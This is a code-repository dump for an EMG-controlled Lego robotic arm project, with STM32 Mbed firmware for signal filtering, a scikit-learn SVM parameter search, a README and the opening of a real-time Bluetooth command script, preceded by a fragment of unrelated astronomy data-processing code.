j++){\r\n\t\t\t\r\n\t\t\t\toutFileCMD_FU<<setprecision(17)<<setw(5)<<Model[j]<<setw(40)<<abs_mag_V[j]<<setw(40)<<abs_mag_I[j]<<setw(40)<<(abs_mag_V[j] - abs_mag_I[j])<<endl; //Note that 17 is the precision of a history file. This will output all numbers\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\toutFileCMD_FU.close();\r\n\t\t\r\n\t\t}\r\n\t\t\r\n\t\t//SetB\r\n\t\tif(i == 1){\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\t//SetC\r\n\t\tif(i == 2){\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\t//SetD\r\n\t\tif(i == 3){\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t}\r\n\t\r\n\treturn 0;\r\n}" } ]
3
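A minimal sketch (not part of the repository above) of what CMD_FileMaker.cpp does per model, assuming the same logs layout and that abs_mag_V and abs_mag_I are the 38th and 39th whitespace-separated columns after six header lines, matching the C++ read order; the function name and single-row read are illustrative:

```python
import numpy as np

def cmd_rows(model_numbers, logs_prefix="LINA_reruns/SetA/LOGS/logs_"):
    # For each positive-growth model, read the first data row of its
    # history file and keep abs_mag_V, abs_mag_I and their difference.
    rows = []
    for m in model_numbers:
        row = np.loadtxt(f"{logs_prefix}{m}/history.data", skiprows=6, max_rows=1)
        v, i = row[37], row[38]  # zero-based indices of the two magnitude columns
        rows.append((m, v, i, v - i))
    return rows
```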
Kostas-Stratakis/EMG-Control-of-Robotic-Arm
https://github.com/Kostas-Stratakis/EMG-Control-of-Robotic-Arm
ca69a6c39ec8dd080cc4f3f7c0b200029d10d223
8c7bae95feef61b29e9fcdb5a19289da650cfd28
7bc416c76dcbe9ce2da3c2389fe5b37fbf44a5ed
refs/heads/master
2020-07-06T01:56:22.410361
2019-08-18T10:58:38
2019-08-18T10:58:38
202,853,057
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.47481420636177063, "alphanum_fraction": 0.5582163333892822, "avg_line_length": 30.560537338256836, "blob_id": "a2f6543a13da69f73ea28a2908fa0d6cc7fdccd5", "content_id": "01bb8c0e61d2f18cbfabe8a9aa68ed42647ad206", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7269, "license_type": "permissive", "max_line_length": 211, "num_lines": 223, "path": "/Microprocessor Software.cpp", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "//This Software was designed with Mbed platform for a Nucleo board of STM32 in C++.\r\n// The microprocessor samples 7 seven channels of the ADC at 2048 Hz and filters the signal from DC and 50Hz compoents.\r\n//The the RMS of each channel is computed over window of 128 samples and a vector is sent to a PC.\r\n// Due to analog circuit restrictions only 4 of the 7 computed values are sent via Uart mounted with Bluetooth to PC.\r\n// The vectors sent are stored in files so that datasets are created for the traing of the pattern recogniition algorithm.\r\n//The patern recognition done by an SVM takes place at a PC.\r\n\r\n\r\n#include \"mbed.h\"\r\n\r\n#define pi 3.14159265358979323846\r\n\r\nInterruptIn button(USER_BUTTON);\r\nDigitalOut led(LED1);\r\nSerial blu (PC_4, PA_10);\r\nTicker timer; // declaration of interruppt \r\n\r\n//from which pins to sample. the last one is for the refference electrode\r\nAnalogIn in1(PA_0);\r\nAnalogIn in2(PA_1);\r\nAnalogIn in3(PA_4);\r\nAnalogIn in4(PB_0);\r\nAnalogIn in5(PC_1);\r\nAnalogIn in6(PC_0);\r\nAnalogIn in7(PC_2);\r\n\r\n\r\n\r\n//declaration of buffers for the notch filter for seven channels\r\nfloat xnbuffer1[2]={0},xnbuffer2[2]={0},xnbuffer3[2]={0},xnbuffer4[2]={0},xnbuffer5[2]={0},xnbuffer6[2]={0},xnbuffer7[2]={0}; // here the previous values of analog in will be stored for each channel\r\nfloat ynbuffer1[2]={0},ynbuffer2[2]={0},ynbuffer3[2]={0},ynbuffer4[2]={0},ynbuffer5[2]={0},ynbuffer6[2]={0},ynbuffer7[2]={0};// here the previous values of the notch filter output will be stored for each channel\r\n\r\n//daclaration of variables to store the adc values from analog in \r\nfloat xn1=0,xn2=0,xn3=0,xn4=0,xn5=0,xn6=0,xn7=0;\r\n//x[n-1] buffer, x[n]buffer\r\nfloat xn1prev=0,xn2prev=0,xn3prev=0,xn4prev=0;\r\nfloat xn1now=0,xn2now=0,xn3now=0,xn4now=0;\r\n//declaration of the filter output variables for each channel\r\nfloat yn1=0,yn2=0,yn3=0,yn4=0,yn5=0,yn6=0,yn7=0;\r\n\r\n//declaration of window buffers after the notch. 
Here 128 consecutive values from them notch filter for each channel will be stored\r\nfloat chan1[128]={0};\r\nfloat chan2[128]={0};\r\nfloat chan3[128]={0};\r\nfloat chan4[128]={0};\r\nfloat chan5[128]={0};\r\nfloat chan6[128]={0};\r\nfloat chan7[128]={0};\r\n\r\n// declaration of feature vector to send\r\nfloat x[7]={0}; \r\n\r\n//declaration of variable that is changed in the timer function and in button interrupt\r\nint interval=0;\r\nbool btn=0;\r\n\r\nvoid button_press(){\r\n btn=!btn;\r\n}\r\n\r\nvoid timer_interrupt() {\r\n interval=1;\r\n}\r\n\r\nint main() {\r\nblu.baud(9600); // with 9600 baud it loses samples if sending just the xn values\r\n\r\n//declaration of main variables\r\nint i=0; // 128 values buffer index\r\nint j; //counter for rms for\r\n\r\n// declaration of the 50Hz filter coefficients\r\nfloat a1,a2,b1,r=0.99,w0=(50.0/1048.0)*pi;\r\n\r\n//computing the coefficients\r\na1=2*r*cos(w0);\r\na2=r*r;\r\nb1=2*cos(w0);\r\n\r\n // enabling the interrupts\r\ntimer.attach(&timer_interrupt, 1.0/2048.0);\r\nbutton.fall(&button_press);\r\n\r\n\r\nwhile (true) {\r\n \r\nif(interval==1){\r\nif(btn==1){\r\n \r\n //transfering values from analog in objects in* to variables xn removing dc. Mbed analog in returns values in [0,1]\r\n //implementaion of DC filter x[n]-x[n-1]\r\n \r\n xn1now=(in1*3.6f);\r\n xn2now=(in2*3.6f);\r\n xn3now=(in3*3.6f);\r\n xn4now=(in4*3.6f);\r\n \r\n //xn1,2,3,4 is the output fo the DC filter\r\n xn1=xn1now-xn1prev;\r\n xn2=xn2now-xn2prev;\r\n xn3=xn3now-xn3prev;\r\n xn4=xn4now-xn4prev;\r\n xn5=(in5*3.6f);\r\n xn6=(in6*3.6f);\r\n xn7=(in7*3.6f);\r\n \r\n //filtering the 7 channels with the notch\r\n yn1=a1*ynbuffer1[1]-a2*ynbuffer1[0]+xn1-b1*xnbuffer1[1]+xnbuffer1[0]; \r\n yn2=a1*ynbuffer2[1]-a2*ynbuffer2[0]+xn2-b1*xnbuffer2[1]+xnbuffer2[0]; \r\n yn3=a1*ynbuffer3[1]-a2*ynbuffer3[0]+xn3-b1*xnbuffer3[1]+xnbuffer3[0];\r\n yn4=a1*ynbuffer4[1]-a2*ynbuffer4[0]+xn4-b1*xnbuffer4[1]+xnbuffer4[0];\r\n yn5=a1*ynbuffer5[1]-a2*ynbuffer5[0]+xn5-b1*xnbuffer5[1]+xnbuffer5[0];\r\n yn6=a1*ynbuffer6[1]-a2*ynbuffer6[0]+xn6-b1*xnbuffer6[1]+xnbuffer6[0];\r\n yn7=a1*ynbuffer7[1]-a2*ynbuffer7[0]+xn7-b1*xnbuffer7[1]+xnbuffer7[0];\r\n \r\n \r\n \r\n // sending the output of filter\r\n //blu.printf(\"%0.5f\\r\\n\",yn1);\r\n \r\n //changing the values in the buffers for the next samples computation\r\n //1st channel\r\n ynbuffer1[0]=ynbuffer1[1];\r\n ynbuffer1[1]=yn1;\r\n xnbuffer1[0]=xnbuffer1[1];\r\n xnbuffer1[1]=xn1;\r\n //2nd channel\r\n ynbuffer2[0]=ynbuffer2[1];\r\n ynbuffer2[1]=yn2;\r\n xnbuffer2[0]=xnbuffer2[1];\r\n xnbuffer2[1]=xn2;\r\n //3rd channel\r\n ynbuffer3[0]=ynbuffer3[1];\r\n ynbuffer3[1]=yn3;\r\n xnbuffer3[0]=xnbuffer3[1];\r\n xnbuffer3[1]=xn3;\r\n //4th channel\r\n ynbuffer4[0]=ynbuffer4[1];\r\n ynbuffer4[1]=yn4;\r\n xnbuffer4[0]=xnbuffer4[1];\r\n xnbuffer4[1]=xn4;\r\n //5th channel\r\n ynbuffer5[0]=ynbuffer5[1];\r\n ynbuffer5[1]=yn5;\r\n xnbuffer5[0]=xnbuffer5[1];\r\n xnbuffer5[1]=xn5;\r\n //6th channel\r\n ynbuffer6[0]=ynbuffer6[1];\r\n ynbuffer6[1]=yn6;\r\n xnbuffer6[0]=xnbuffer6[1];\r\n xnbuffer6[1]=xn6;\r\n //7th channel\r\n ynbuffer7[0]=ynbuffer7[1];\r\n ynbuffer7[1]=yn7;\r\n xnbuffer7[0]=xnbuffer7[1];\r\n xnbuffer7[1]=xn7;\r\n \r\n //changing values for the x[n-1] buffer\r\n xn1prev=xn1now;\r\n xn2prev=xn2now;\r\n xn3prev=xn3now;\r\n xn4prev=xn4now;\r\n \r\n \r\n // amassing the outputs of the 7 notches to the corresponding 128-values buffers \r\n if(i<128){\r\n chan1[i]=pow(yn1,2);\r\n chan2[i]=pow(yn2,2);\r\n chan3[i]=pow(yn3,2);\r\n 
chan4[i]=pow(yn4,2);\r\n        chan5[i]=pow(yn5,2);\r\n        chan6[i]=pow(yn6,2);\r\n        chan7[i]=pow(yn7,2);\r\n        i++;\r\n    } \r\n    \r\n    if(i==128){\r\n        // rms computation \r\n        // this loop computes Σxi^2 for each channel \r\n        for(j=0;j<128;j++){\r\n        x[0]=x[0]+chan1[j];\r\n        x[1]=x[1]+chan2[j];\r\n        x[2]=x[2]+chan3[j];\r\n        x[3]=x[3]+chan4[j];\r\n        x[4]=x[4]+chan5[j];\r\n        x[5]=x[5]+chan6[j];\r\n        x[6]=x[6]+chan7[j];\r\n        }\r\n        // do not forget to zero out x at the end \r\n        x[0]=sqrt(x[0]/128.0f);\r\n        x[1]=sqrt(x[1]/128.0f);\r\n        x[2]=sqrt(x[2]/128.0f);\r\n        x[3]=sqrt(x[3]/128.0f);\r\n        x[4]=sqrt(x[4]/128.0f);\r\n        x[5]=sqrt(x[5]/128.0f);\r\n        x[6]=sqrt(x[6]/128.0f); \r\n        \r\n        blu.printf(\"%0.5f,%0.5f,%0.5f,%0.5f \\r\\n\\0\",x[0],x[1],x[2],x[3]);\r\n        \r\n        // re-initialize x vector to zero \r\n        for(j=0;j<7;j++){\r\n        x[j]=0; }//for j end \r\n        \r\n        i=0;\r\n        \r\n    } // if i==128 end \r\n    }// if btn==1 end \r\n     \r\n    interval=0; \r\n     \r\n    }// if interval ==1 end\r\n    \r\n    \r\n    \r\n    }// while true end\r\n}// main end\r\n \r\n" }, { "alpha_fraction": 0.5710580945014954, "alphanum_fraction": 0.6516251564025879, "avg_line_length": 40.485294342041016, "blob_id": "6dcf061acf9fa0da333aecef82d7b1fe8bb3fc65", "content_id": "6f611be2edcdf3fab2e3e8e2d4a0145dd4e96692", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11568, "license_type": "permissive", "max_line_length": 188, "num_lines": 272, "path": "/Finding_best_SVM_for_5gestures.py", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "#This code successively trains SVMs with different parameters C and gamma to find the one with the best recognition scores for 5 gestures.\r\n#The datasets are retrieved from the local drive where they were stored at a previous step. 
(look at Microprocessor Software).\r\n#The parameters and the kernel with the best recall score should be noted so that they can be given to another Python code which trains an SVM and sends commands to the Lego NXT Robot.\r\n\r\n\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\nnp.set_printoptions(threshold=sys.maxsize)\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import preprocessing\r\n\r\n# session 1 loading data to variables lists\r\ns1g0=\"C:/Users/ece73/Desktop/recordings/session1/gesture0.txt\"\r\ns1g1=\"C:/Users/ece73/Desktop/recordings/session1/gesture1.txt\"\r\ns1g2=\"C:/Users/ece73/Desktop/recordings/session1/gesture2.txt\"\r\ns1g3=\"C:/Users/ece73/Desktop/recordings/session1/gesture3.txt\"\r\ns1g4=\"C:/Users/ece73/Desktop/recordings/session1/gesture4.txt\"\r\ns1g5=\"C:/Users/ece73/Desktop/recordings/session1/gesture5.txt\"\r\ns1g6=\"C:/Users/ece73/Desktop/recordings/session1/gesture6.txt\"\r\ns1g7=\"C:/Users/ece73/Desktop/recordings/session1/gesture7.txt\"\r\ns1g8=\"C:/Users/ece73/Desktop/recordings/session1/gesture8.txt\"\r\n\r\nds1g0 = np.loadtxt(s1g0, delimiter=\",\")\r\nds1g1 = np.loadtxt(s1g1, delimiter=\",\")\r\nds1g2 = np.loadtxt(s1g2, delimiter=\",\")\r\nds1g3 = np.loadtxt(s1g3, delimiter=\",\")\r\nds1g4 = np.loadtxt(s1g4, delimiter=\",\")\r\nds1g5 = np.loadtxt(s1g5, delimiter=\",\")\r\nds1g6 = np.loadtxt(s1g6, delimiter=\",\")\r\nds1g7 = np.loadtxt(s1g7, delimiter=\",\")\r\nds1g8 = np.loadtxt(s1g8, delimiter=\",\")\r\n###################################################\r\n\r\n# session 2 loading data to variables lists\r\ns2g0=\"C:/Users/ece73/Desktop/recordings/session2/gesture0.txt\"\r\ns2g1=\"C:/Users/ece73/Desktop/recordings/session2/gesture1.txt\"\r\ns2g2=\"C:/Users/ece73/Desktop/recordings/session2/gesture2.txt\"\r\ns2g3=\"C:/Users/ece73/Desktop/recordings/session2/gesture3.txt\"\r\ns2g4=\"C:/Users/ece73/Desktop/recordings/session2/gesture4.txt\"\r\ns2g5=\"C:/Users/ece73/Desktop/recordings/session2/gesture5.txt\"\r\ns2g6=\"C:/Users/ece73/Desktop/recordings/session2/gesture6.txt\"\r\ns2g7=\"C:/Users/ece73/Desktop/recordings/session2/gesture7.txt\"\r\ns2g8=\"C:/Users/ece73/Desktop/recordings/session2/gesture8.txt\"\r\n\r\nds2g0 = np.loadtxt(s2g0, delimiter=\",\")\r\nds2g1 = np.loadtxt(s2g1, delimiter=\",\")\r\nds2g2 = np.loadtxt(s2g2, delimiter=\",\")\r\nds2g3 = np.loadtxt(s2g3, delimiter=\",\")\r\nds2g4 = np.loadtxt(s2g4, delimiter=\",\")\r\nds2g5 = np.loadtxt(s2g5, delimiter=\",\")\r\nds2g6 = np.loadtxt(s2g6, delimiter=\",\")\r\nds2g7 = np.loadtxt(s2g7, delimiter=\",\")\r\nds2g8 = np.loadtxt(s2g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 3 loading data to variables 
lists\r\ns3g0=\"C:/Users/ece73/Desktop/recordings/session3/gesture0.txt\"\r\ns3g1=\"C:/Users/ece73/Desktop/recordings/session3/gesture1.txt\"\r\ns3g2=\"C:/Users/ece73/Desktop/recordings/session3/gesture2.txt\"\r\ns3g3=\"C:/Users/ece73/Desktop/recordings/session3/gesture3.txt\"\r\ns3g4=\"C:/Users/ece73/Desktop/recordings/session3/gesture4.txt\"\r\ns3g5=\"C:/Users/ece73/Desktop/recordings/session3/gesture5.txt\"\r\ns3g6=\"C:/Users/ece73/Desktop/recordings/session3/gesture6.txt\"\r\ns3g7=\"C:/Users/ece73/Desktop/recordings/session3/gesture7.txt\"\r\ns3g8=\"C:/Users/ece73/Desktop/recordings/session3/gesture8.txt\"\r\n\r\nds3g0 = np.loadtxt(s3g0, delimiter=\",\")\r\nds3g1 = np.loadtxt(s3g1, delimiter=\",\")\r\nds3g2 = np.loadtxt(s3g2, delimiter=\",\")\r\nds3g3 = np.loadtxt(s3g3, delimiter=\",\")\r\nds3g4 = np.loadtxt(s3g4, delimiter=\",\")\r\nds3g5 = np.loadtxt(s3g5, delimiter=\",\")\r\nds3g6 = np.loadtxt(s3g6, delimiter=\",\")\r\nds3g7 = np.loadtxt(s3g7, delimiter=\",\")\r\nds3g8 = np.loadtxt(s3g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 4 loading data to variables lists\r\ns4g0=\"C:/Users/ece73/Desktop/recordings/session4/gesture0.txt\"\r\ns4g1=\"C:/Users/ece73/Desktop/recordings/session4/gesture1.txt\"\r\ns4g2=\"C:/Users/ece73/Desktop/recordings/session4/gesture2.txt\"\r\ns4g3=\"C:/Users/ece73/Desktop/recordings/session4/gesture3.txt\"\r\ns4g4=\"C:/Users/ece73/Desktop/recordings/session4/gesture4.txt\"\r\ns4g5=\"C:/Users/ece73/Desktop/recordings/session4/gesture5.txt\"\r\ns4g6=\"C:/Users/ece73/Desktop/recordings/session4/gesture6.txt\"\r\ns4g7=\"C:/Users/ece73/Desktop/recordings/session4/gesture7.txt\"\r\ns4g8=\"C:/Users/ece73/Desktop/recordings/session4/gesture8.txt\"\r\n\r\nds4g0 = np.loadtxt(s4g0, delimiter=\",\")\r\nds4g1 = np.loadtxt(s4g1, delimiter=\",\")\r\nds4g2 = np.loadtxt(s4g2, delimiter=\",\")\r\nds4g3 = np.loadtxt(s4g3, delimiter=\",\")\r\nds4g4 = np.loadtxt(s4g4, delimiter=\",\")\r\nds4g5 = np.loadtxt(s4g5, delimiter=\",\")\r\nds4g6 = np.loadtxt(s4g6, delimiter=\",\")\r\nds4g7 = np.loadtxt(s4g7, delimiter=\",\")\r\nds4g8 = np.loadtxt(s4g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 5 loading data to variables lists\r\ns5g0=\"C:/Users/ece73/Desktop/recordings/session5/gesture0.txt\"\r\ns5g1=\"C:/Users/ece73/Desktop/recordings/session5/gesture1.txt\"\r\ns5g2=\"C:/Users/ece73/Desktop/recordings/session5/gesture2.txt\"\r\ns5g3=\"C:/Users/ece73/Desktop/recordings/session5/gesture3.txt\"\r\ns5g4=\"C:/Users/ece73/Desktop/recordings/session5/gesture4.txt\"\r\ns5g5=\"C:/Users/ece73/Desktop/recordings/session5/gesture5.txt\"\r\ns5g6=\"C:/Users/ece73/Desktop/recordings/session5/gesture6.txt\"\r\ns5g7=\"C:/Users/ece73/Desktop/recordings/session5/gesture7.txt\"\r\ns5g8=\"C:/Users/ece73/Desktop/recordings/session5/gesture8.txt\"\r\n\r\nds5g0 = np.loadtxt(s5g0, delimiter=\",\")\r\nds5g1 = np.loadtxt(s5g1, delimiter=\",\")\r\nds5g2 = np.loadtxt(s5g2, delimiter=\",\")\r\nds5g3 = np.loadtxt(s5g3, delimiter=\",\")\r\nds5g4 = np.loadtxt(s5g4, delimiter=\",\")\r\nds5g5 = np.loadtxt(s5g5, delimiter=\",\")\r\nds5g6 = np.loadtxt(s5g6, delimiter=\",\")\r\nds5g7 = np.loadtxt(s5g7, delimiter=\",\")\r\nds5g8 = np.loadtxt(s5g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# Creating y lists for the classification for every session and every gesture\r\n#session 1 gestures y matrices\r\nys1g0=[0 for i in range(len(ds1g0))]\r\nys1g1=[1 
for i in range(len(ds1g1))]\r\nys1g2=[2 for i in range(len(ds1g2))]\r\nys1g3=[3 for i in range(len(ds1g3))]\r\nys1g4=[4 for i in range(len(ds1g4))]\r\nys1g5=[5 for i in range(len(ds1g5))]\r\nys1g6=[6 for i in range(len(ds1g6))]\r\nys1g7=[7 for i in range(len(ds1g7))]\r\nys1g8=[8 for i in range(len(ds1g8))]\r\n\r\n#session 2 gestures y matrices\r\nys2g0=[0 for i in range(len(ds2g0))]\r\nys2g1=[1 for i in range(len(ds2g1))]\r\nys2g2=[2 for i in range(len(ds2g2))]\r\nys2g3=[3 for i in range(len(ds2g3))]\r\nys2g4=[4 for i in range(len(ds2g4))]\r\nys2g5=[5 for i in range(len(ds2g5))]\r\nys2g6=[6 for i in range(len(ds2g6))]\r\nys2g7=[7 for i in range(len(ds2g7))]\r\nys2g8=[8 for i in range(len(ds2g8))]\r\n\r\n#session 3 gestures y matrices\r\nys3g0=[0 for i in range(len(ds3g0))]\r\nys3g1=[1 for i in range(len(ds3g1))]\r\nys3g2=[2 for i in range(len(ds3g2))]\r\nys3g3=[3 for i in range(len(ds3g3))]\r\nys3g4=[4 for i in range(len(ds3g4))]\r\nys3g5=[5 for i in range(len(ds3g5))]\r\nys3g6=[6 for i in range(len(ds3g6))]\r\nys3g7=[7 for i in range(len(ds3g7))]\r\nys3g8=[8 for i in range(len(ds3g8))]\r\n\r\n#session 4 gestures y matrices\r\nys4g0=[0 for i in range(len(ds4g0))]\r\nys4g1=[1 for i in range(len(ds4g1))]\r\nys4g2=[2 for i in range(len(ds4g2))]\r\nys4g3=[3 for i in range(len(ds4g3))]\r\nys4g4=[4 for i in range(len(ds4g4))]\r\nys4g5=[5 for i in range(len(ds4g5))]\r\nys4g6=[6 for i in range(len(ds4g6))]\r\nys4g7=[7 for i in range(len(ds4g7))]\r\nys4g8=[8 for i in range(len(ds4g8))]\r\n\r\n#session 5 gestures y matrices\r\nys5g0=[0 for i in range(len(ds5g0))]\r\nys5g1=[1 for i in range(len(ds5g1))]\r\nys5g2=[2 for i in range(len(ds5g2))]\r\nys5g3=[3 for i in range(len(ds5g3))]\r\nys5g4=[4 for i in range(len(ds5g4))]\r\nys5g5=[5 for i in range(len(ds5g5))]\r\nys5g6=[6 for i in range(len(ds5g6))]\r\nys5g7=[7 for i in range(len(ds5g7))]\r\nys5g8=[8 for i in range(len(ds5g8))]\r\n\r\n#creating a complete dataset with y matrices for every session. \r\n#session 1\r\nds1=np.concatenate((ds1g0,ds1g3,ds1g4,ds1g6,ds1g8))\r\nys1=np.concatenate((ys1g0,ys1g3,ys1g4,ys1g6,ys1g8))\r\n\r\n#session 2\r\nds2=np.concatenate((ds2g0,ds2g3,ds2g4,ds2g6,ds2g8))\r\nys2=np.concatenate((ys2g0,ys2g3,ys2g4,ys2g6,ys2g8))\r\n\r\n#session 3\r\nds3=np.concatenate((ds3g0,ds3g3,ds3g4,ds3g6,ds3g8))\r\nys3=np.concatenate((ys3g0,ys3g3,ys3g4,ys3g6,ys3g8))\r\n\r\n#session 4\r\nds4=np.concatenate((ds4g0,ds4g3,ds4g4,ds4g6,ds4g8))\r\nys4=np.concatenate((ys4g0,ys4g3,ys4g4,ys4g6,ys4g8))\r\n\r\n#session 5\r\nds5=np.concatenate((ds5g0,ds5g3,ds5g4,ds5g6,ds5g8))\r\nys5=np.concatenate((ys5g0,ys5g3,ys5g4,ys5g6,ys5g8))\r\n\r\n#Creating the input for SVM. 
Complete data (x matrix) and y matrices.\r\ndatall=np.concatenate((ds1,ds2,ds3,ds4,ds5))\r\nysall=np.concatenate((ys1,ys2,ys3,ys4,ys5))\r\n# =============================================================================\r\n# \r\n# =============================================================================\r\n\r\n#selecting sessions for training\r\ndata=datall\r\ny=ysall\r\n#selecting testing session\r\n\r\nmeanvals=np.mean(data,0)\r\nstds=np.std(data,0)\r\nprint (meanvals)\r\nprint(stds)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.3, random_state=0)\r\nscaler = preprocessing.StandardScaler().fit(X_train)\r\nX_train_transformed = scaler.transform(X_train)\r\nX_test_transformed = scaler.transform(X_test)\r\n\r\n\r\n\r\n# Split the dataset in two equal parts\r\n# =============================================================================\r\n# X_train, X_test, y_train, y_test = train_test_split(\r\n# data, y, test_size=0.2, random_state=0)\r\n# \r\n# =============================================================================\r\n# Set the parameters by cross-validation\r\ntuned_parameters = [{'kernel': ['rbf'], 'gamma': [2**(3),2**(2),2**(1),2**(0),2**(-1), 2**(-2),2**(-3),2**(-4),2**(-5)],\r\n 'C': [2**(-10),2**(-9),2**(-8),2**(-7),2**(-6), 2**(-5),2**(-4),2**(-3),2**(-2),2**(-1),2**(0),2**(1),2**(2),2**(3), 2**(4),2**(5),2**(6),2**(7),2**(8),2**(9),2**(10)]\r\n ,'decision_function_shape':['ovr']},\r\n {'kernel': ['linear'],\r\n 'C': [2**(-10),2**(-9),2**(-8),2**(-7),2**(-6), 2**(-5),2**(-4),2**(-3),2**(-2),2**(-1),2**(0),2**(1),2**(2),2**(3), 2**(4),2**(5),2**(6),2**(7),2**(8),2**(9),2**(10)]\r\n ,'decision_function_shape':['ovr']} ]\r\n\r\nscores = ['recall']\r\n\r\nfor score in scores:\r\n print(\"# Tuning hyper-parameters for %s\" % score)\r\n print()\r\n\r\n clf = GridSearchCV(SVC(), tuned_parameters, cv=5,\r\n scoring='%s_macro' % score)\r\n clf.fit(X_train_transformed, y_train)\r\n\r\n print(\"Best parameters set found on development set:\")\r\n print()\r\n print(clf.best_params_)\r\n print()\r\n print(\"Grid scores on development set:\")\r\n print()\r\n means = clf.cv_results_['mean_test_score']\r\n stds = clf.cv_results_['std_test_score']\r\n for mean, std, params in zip(means, stds, clf.cv_results_['params']):\r\n print(\"%0.3f (+/-%0.03f) for %r\"\r\n % (mean, std * 2, params))\r\n print()\r\n\r\n print(\"Detailed classification report:\")\r\n print()\r\n print(\"The model is trained on the full development set.\")\r\n print(\"The scores are computed on the full evaluation set.\")\r\n print()\r\n y_true, y_pred = y_test, clf.predict(X_test_transformed)\r\n print(classification_report(y_true, y_pred))\r\n print()\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.8088170886039734, "alphanum_fraction": 0.8153644800186157, "avg_line_length": 133.76470947265625, "blob_id": "14450feb0d1abc6088c9911e3a147b49a0ae5fa3", "content_id": "a61597dcb41dee7650dfff1d6effe814bf3ccff1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2291, "license_type": "permissive", "max_line_length": 334, "num_lines": 17, "path": "/README.md", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "# EMG-Control-of-Robotic-Arm\nThis project 's goal is to control a robotic arm built from lego using EMG signal recorded from a user performing static gestures.\nThe main idea is that, the user performs a number static gestures 10 seconds each and records the 
signal.\nThese signals are stored to create data-sets. These data-sets are used to train an SVM that does the recognition (classification) of each gesture.\nAfter the classification a corresponding command to start or stop a motor is sent to the Lego NXT, which is the microprocessor that controls the motors.\n\nIn this repository, besides the Readme and the License files, there are 6 other files. A short description for each one of them follows:\nSignal amplifiers.png: This schematic depicts the analog circuit that must be built for recording the EMG signal from a pair of muscles of interest.\nPower supply circuit.png: The schematic for powering up the aforementioned circuit.\nMicroprocessor Software: The code running on an STM32 Nucleo board. It samples the signal, filters it, and then sends RMS values computed over a window to a PC. It was developed using the Mbed platform and libraries.\nFinding_best_SVM_for_5gestures.py: This Python code uses the scikit-learn library to train SVMs with different parameters to find the one among them that classifies the gestures best. The data-sets needed for the training are created by storing the values sent by Microprocessor Software.\nSending_real-time_Commands.py: This Python code takes the parameters found by the previous Python code and trains an SVM. This SVM receives data (vectors) in real time and classifies it, trying to recognize the gesture the user is doing. Based on the recognized gesture, commands are sent via Bluetooth to the NXT for motor control.\nMyoelectric Control of Robotic Arm Msc Thesis.pdf: This document is my diploma thesis. All the details and the knowledge needed for understanding and building this project are included. In the conclusion chapter, the inherent difficulties and the aspects that need more research are stated and explained.\n\nA video showing real-time operation, classifying among 5 gestures and recording from 4 muscles of interest, exists at the following Google Drive link:\n\nhttps://drive.google.com/open?id=1bZBQOkEBfMYjs1B4Ci36rJVv6ELplE3P\n" }, { "alpha_fraction": 0.5675817131996155, "alphanum_fraction": 0.6851671934127808, "avg_line_length": 43.705684661865234, "blob_id": "55b97ceee2f6698dd6704046eb2b39b369b4ba02", "content_id": "88364923423bfc1b87a13911e0704b39ecf03aef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13369, "license_type": "permissive", "max_line_length": 170, "num_lines": 299, "path": "/Sending_real-time_Commands.py", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "# In this Python code, on line 230, change the parameters C and Gamma to the values found by the other Python code named \"Finding_best_SVM_for_5gestures.py\"\r\n#This code trains the optimal SVM and then sends commands in the form of byte streams to the Lego NXT microprocessor so that the motors start and stop moving in real time.\r\n\r\n\r\nimport serial\r\nimport time\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\nnp.set_printoptions(threshold=sys.maxsize)\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import preprocessing\r\n\r\n#opening the ports to be ready for comms\r\n#ser.__del__()\r\n#serout.__del__()\r\nserout=serial.Serial('COM3', 9600) #com3 bluetooth out for 
